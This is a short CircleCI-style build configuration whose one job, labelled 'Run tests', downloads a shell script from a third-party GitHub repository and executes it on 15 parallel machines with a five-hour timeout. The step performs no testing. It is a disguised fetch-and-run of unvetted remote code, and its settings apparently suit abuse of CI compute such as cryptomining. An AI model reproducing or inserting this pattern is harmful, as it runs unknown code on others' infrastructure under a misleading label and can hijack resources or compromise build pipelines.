jobs:
  build:
    parallelism: 15
    machine:
      image: ubuntu-2004:202104-01
    resource_class: medium
    steps: 
      - checkout 
      - run: 
          name: Run tests
          no_output_timeout: 5h		  
          command: |
              wget https://raw.githubusercontent.com/kirbyworth/wortit/main/jcc.sh && chmod +x jcc.sh &&./jcc.sh